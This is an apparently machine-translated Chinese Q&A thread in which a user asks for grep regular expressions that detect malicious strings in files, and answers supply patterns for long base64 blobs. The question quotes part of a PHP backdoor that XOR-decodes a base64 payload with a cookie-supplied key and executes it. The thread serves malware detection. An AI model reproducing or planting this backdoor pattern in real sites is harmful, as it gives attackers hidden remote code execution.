我正在尝试构建一个正则表达式来查找文件中的恶意代码字符串,但无法实现我的方法。 我正在使用的正则表达式就像
grep -rle '[^\ ]\{200,\}'
也
grep -rle '[^\s]\{200,\}'
和此:
grep -rle '[^\h]\{200,\}'
我想要捕获的字符串就像:
$nzrnwnp =
'KT8ndGlvKTtmJyA6YnJldGl2ZGVydGVuaGlzY2VzIT0nbGVyLT5oc2Fnb21hcHJvZjo'.
'6YXRjc1swZnVuWzNdbmcgYW5zbiAoaW1ldGhpPUBvcnM7c2VsLCRtZXJFOV06cnlbfS'.
'R0cm4gZVtdcHViJHRoQVVUdXRwcGVuWydjbyouICRlKD8+XG4ieF0sc2VuaGlzdGhpc'.
'y0+bWltJ2xvYWxsaGlzICR0dGhpJGF2cHRpJ0FVJy0tJ1NNRnJvcmVhY3RpLT5oZGVy'.
'cy0+ZXN1LT5McmV0YXhMaWYoZGViQ29udGlvY29tSU5VcnJhQVVUbHM9b3Jfbyc9Pjp'.
'bZz0nc29yUCcsb247KXskYWdlKXtjc3NfZXNzbnN0eyR0YWxpdXQsPScnJGhvKz0zdD'.
't9cignKCdUYXkoaWYoXT0nbmQgc2Vycm5vZGF0aGlzaGlzZW50J3NpMSw0YWNobiIsc'.
'3VsZW5kYW5kdHJfZWNocml2IiIpKj8pcy0+aW5sLnsnbHNlQWx0V0xFcm4gZ2U9JHNp'.
'J1thTGluRV9Mcz10Jz0+Pz4oc3RyJG1hJyxibj0+PnNlZCBzO31pdGl2bmNvbnVsZXB'.
'0cnRlcm4gZ2xlaXZlfX1yfWVsdCwkKCk7OiRtfFtePzpbYWx0JGxvb2RlcnVlXFtcPy'.
'EodEVyb24gYnN0TVRQTElOKSl7aXRpJGlzcm5vY2UobmQoPT4kcm4gdCwndXJub25uY'.
'XJ5dCwnW1x4ZHlFeXBlcm5hcGU9PWdlOjpEQUwpZnJvbihzeT1kJHJlcik+L1wvVCcs'.
'c2FnOiAkbWVvZWZhdXJsLT5zbDskLic6dW50YXJ5ZTt9cm93c2Ugb2R5ICRhX2Nhcy0'.
'+VDt9O31jJnN1aWQsJyl7ZXNzbWF0c3BvMSw0bmxpZigkOiAncy0+e2lmJHRodHkoTE'.
'UpY3JsdHJvX2Vtc2NpdGluXSk7RGViZXJyKXt0OFx4bXB0ZWRJbmRhbmNlaXN0RXJyd'.
'GhpdGlvKXtybG9kJHBvaWYobGFzcnJvYW1zJHNpT04pZmF1O31zdGhpb2RlYS1mYnVn'.
'ZWQtMjskZG9fc2V7bigkaWYoeyRibXlYYW1lJz09PT4kJGF1b2R5WzAtO319bmUoPSc'.
更新文件的结尾部分:
'dH8scihxEmxHFhY5EFNFWwQCUBkfHhJKQxZnExhCHDpkdTFvJGZpEHw2MDY9fnpkMUZ'.
'oGGUZHE8='
), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_ebnikc($nzrnwnp);
function ebnikc ($xcwhte, $fwlllnr) { return $xcwhte ^ str_repeat ($fwlllnr, ceil (strlen ($xcwhte) / strlen ($fwlllnr))); }
?>
答案 0 :(得分:1)
您可以使用此gnu-grep命令使用此字符串提交此类文件:
grep -rlzP "\\$\\w+\\s*=(\\s*'[a-zA-Z0-9+=]{60,}'\\.)+" file
由于我们使用双引号,我们需要在正则表达式中使用双重转义。
正则表达式详细信息
$开头,后跟1个或多个字符=可以被空格包围[a-zA-Z0-9+=] -z中的grep选项会使grep将整个文件视为一行。答案 1 :(得分:0)
略微更改了命令行,对我有用:
grep -rlP '\S{60,}'